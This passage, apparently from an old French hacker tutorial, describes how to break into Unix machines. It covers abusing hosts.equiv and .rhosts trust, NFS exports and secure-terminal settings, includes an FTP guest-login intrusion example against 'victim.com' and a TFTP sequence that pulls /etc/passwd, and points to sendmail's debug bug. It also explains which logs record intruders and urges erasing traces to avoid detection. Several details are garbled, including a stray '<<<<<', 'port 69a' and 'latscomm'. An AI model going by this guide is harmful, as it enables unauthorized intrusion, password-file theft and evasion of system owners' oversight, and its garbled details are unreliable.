Certaines version de UNiX sont livrees avec une seule entree dans le fichier
host.equiv : un "+". Si c le cas sur la machine convoitee et libre acce pour
tout le monde car le "+" signifie que toutes les machines sont classees comme
equivalentes ;)))))))).
Les fichier .rhost permet à des utilisateur specifiques d'acceder a des
becanes specifiques sans passwd. Tout utilisateur peut creer un fichier
.rhostdans son repertoire de connexion et autoriser l'acce a son compte
sans passwd. Tout utilisateur peut donner un acces sans passwd à n'importe
qui !!! :))))

2.Les terminaux securises :
---------------------------
Selon les versions d'UNiX, le fichier qui definie les terminaux securises est
soit : /etc/ttyab, soit : /etc/ttys. Pour autoriser le super utilisateur
a se connecter à partir d'un terminal donne, faut ajouter dans le fichier le
mot cle "secure" a la fin de la ligne d'identification du terminal.
Si "secure" n'est pas mis a la fin de ligne d'identification du terminal, un
utilisateur etant super utilisateur peut se connecter sur un compte ordinaire
et ensuite devenir super utilisateur avec la commande "su" :))).

3.NFS :
-------
NFS (Network File System) est un protocole qui permet à plusieur machines de
partager des fichiers. Il est très utile pour permettre aux stations sans HD
de stosker leur fichier dans une autre machine + centralisee.
Le fichier /etc/exports contient la liste des fichiers que les autres
machines ont le droit de monter sur le reseau. Voici les differrents droit de
ces machine :

 root=machines (machines etant la description des machines) : lorque
l'ontvois ca, c que les machines sitees ont le droit root (ou super
utilisateur).
 access=machines : la  ce sont seulement les machines autorisees a
monter des repertoires...

lorqu'il n'y a pas d'option access, toutes les machines sont autorises à mon-
ter le repertoire.

/etc/exports est presente comme suit en presence de l'option access :
  /usr access=machine1:machine2:machine3...
ou bien /usr root=machine1:machine2:machine3...

De plus si l'adminitrateur lors de l'edition du fichier a oublier de taper la
commande : # exportfs -a, le systeme ne relira pas forcement le fichier :))).

4.FTP (file transfert protocole):
---------------------------------
Bon. Je pense que vous connaissez. A partir de FTP on peut facilement<<<<<aquerir l'acces root, mais en ce qui concerne le fichier passwd, souvent
le droit d'acces en lecture est coupe pour ce fichier....
EX d'intrusion :

 ftp> open victim.com
 Connected to victim.com
 220 victim.com FTP server ready.
 ftp> quote user ftp
 331 Guest login ok, send ident as password.
 ftp> quote cwd ~root
 530 Please login with USER and PASS.
 ftp> quote pass ftp
 230 Guest login ok, access restrictions apply.
 

5.TFTP :
--------
Le petit frère de FTP!!! Son port est le 69a
TFTP peut presentez des brèches assez grandes pour faire passer un TGV... :))
essayer donc la sequence de commandes suivantes :
 

evil %tftp
tftp>connect la_machine
tftp>get /etc/passwd
tftp>quit

6.Sendmail :
------------
Sendmail a aussi un gros bug de securite, meme si on a refait des versions
+ securise, parfois les entreprises mettent du temps a changer leur version.
Connectez vous au sendmail par telnet (port 25=smtp) et tapez debug...
Si la reponse n'est pas "unrecognised command", c que la version du sendmail
est encore buge et que vous pouvez en profiter

7.Finger :
----------
le finger permet a un utilisateur distant de voir le nom complet d'un
utilisateur, son repertoire de connexion, la date de sa derniere
connexion, et la date ou il a lu son courrier pour la derniere fois...

III.Securite des fichiers et des repertoires  :
-----------------------------------------------

1.Les bits de droit d'accès :
-----------------------------
Tous les fichiers et repertoires UNiX ont trois ensemble de bits de droit d'
acces associes. Le prmier ensemble definit quels sont les droits du proprio
du fichier, le second definit quels sont les droits du groupes proprio du
file & le dernier quels sont les droits d'acces aux autres utilisateurs ;)).

Voici à quoi correspondent les bits des droits d'acces :

*droit d'acces en lecture (read).
*droit d'acces en ecriture (write).
*droit d'execution (execute).
*setuid : lorceque ce bit est positionne sur un fichier, cela signifie que le
fichier est execute avec le droit du proprietaire du fichier.
*setgid : lorceque ce bit est positionne sur un fichier, cela signifie que le
fichier est execute avec le droit du groupe proprietaire du fichier.

Si il n'y a aucun bits associe aux fichiers, tout le monde peut tout faire
avec. ;]

2.Crypt :
---------
Crypt est un moyen de chiffrer les fichiers sous UNiX.
Des cracker les dechiffrent assez vites. On les trouves un peu partout sur le
net.....

3.Les peripheriques de /DEV :
-----------------------------
UNiX accede aux disques et à la memoire par l'intermedeiaire des fichiers (dit
speciaux)du repertoire /dev mais aussi aux machines du style imprimante...
Essaillez donc d'avoir acces a ce genre de fichier, cela peut etre assez amusant
de leur imprimer certaine chose (hihi). Le + souvent seul le root
à acces à ces fichiers.
 
 

-----------------------------------|
III-: la surveillance du systeme : |
-----------------------------------|
 
 

Une fois parti de la machine que vous avez hacker croyez ne pas avoir laissez
de trace ???? Vraiment ???? :)))
Je vous demontre le contraire!!!!
 
 

I-surveillance des comptes :
----------------------------
 

1.le fichier /usr/adm/lastlog :
-------------------------------
Ce fichier est une trace de la date de la derniere session etablie par chaque
utilisateur. Profitez en pour savoir quand se connecte l'utilisateur que
vous avez hacker... Ca pourra vous servir si vous comptez revenir. Je ne
vous le conseille toute fois pas.

2.le fichier /etc/utmp :
------------------------
Le fichier /etc/utmp enregistre qui est connecte sur le moment sur le
systeme. On peut le visualiser avec la commande who.
Soyez donc discret & evitez de faire des choses qui allerterait tout
le monde (surtout tard le soir & meme en root).

3.le fichier /usr/adm/wtmp :
----------------------------
Ce file enregistre les debuts et les fins de sessions de tous les
utilisateurs. On peut executer la commande who sur ce fichier :

  who /usr/adm/wtmp
Pour isoler ce qui vous interresse tapez :

  last /usr/adm/wtmp   username
ou bien :

  last /usr/adm/wtmp   terminal

4.le fichier /var/adm/acct :
----------------------------
Ce file enregistre toutes les commandes executes et le user qui les a
executes.
Pour avoir acces à ce fichier tapez :

  latscomm /var/adm/acct  username
ou bien :
  latscomm /var/adm/acct  terminal
 
 

II-Surveillance des connexions reseau :
---------------------------------------

1.La commande syslog :
----------------------
Avec syslog, on peut forcer n'importe quelle commandes à envoyer des
informations, ainsi que les messages d'erreurs, vers un fichier traces tel
que /usr/adm/messages. Si vous arrivez à vous connecter sur le reseau, en
pleine journee vous pouvez vous contenter d'effacez si vous le pouvez les
traces d'erreurs que vous avez pu commetre, mais il est preferable d'effacer
toutes les traces que vous avez laissez sur ce fichier et sur les autres de
jour ou de nuit.

2.La commande showmount :
-------------------------
Elle permet de voir toute les machines qui ont monte quelque chose à partir
d'un serveur NFS. Sans option elle donne simplement la liste des mac